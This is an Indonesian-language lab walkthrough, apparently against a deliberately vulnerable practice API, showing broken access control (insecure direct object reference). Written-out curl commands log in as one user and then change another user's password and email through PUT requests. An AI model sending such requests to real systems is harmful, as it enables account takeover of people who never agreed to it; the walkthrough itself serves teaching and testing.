Access Control menerapkan kebijakan sedemikian rupa sehingga pengguna tidak dapat bertindak di luar izin yang dimaksudkan. Kegagalan otorisasi biasanya menyebabkan pengungkapan informasi yang tidak sah, modifikasi, penghapusan data atau pelaksanaan fungsi bisnis lain di luar batas pengguna. Misalnya adalah mengizinkan melihat atau mengedit akun orang lain, dengan memberikan pengenal uniknya (insecure direct object references)
- Login terlebih dahulu untuk mengakses endpoint
/users/v1/{username}/password
curl http://IP_Server:5000/users/v1/login -d '{"username":"test","password":"test"}' -H 'Content-Type: application/json' --proxy http://127.0.0.1:8080
- Setelah kita login sebagai user
test
sekarang kita coba mengubah password username1
melalui endpoint/users/v1/{username}/password
curl -X PUT http://IP_Server:5000/users/v1/name1/password -d '{"password":"testing"}' -H 'Authorization: Bearer token' -H 'Content-Type: application/json' -H "Accept: application/json" --proxy http://127.0.0.1:8080 -v
- Disini kita berhasil mengubah password user
name1
meskipun kita login sebagai usertest
. Di sisi lain kita juga bisa mengubah email username1
melalui endpoint/users/v1/{username}/email
curl -X PUT http://IP_Server:5000/users/v1/name1/email -d '{"email":"testing@mail.com"}' -H 'Authorization: Bearer token' -H 'Content-Type: application/json' -H "Accept: application/json" --proxy http://127.0.0.1:8080 -v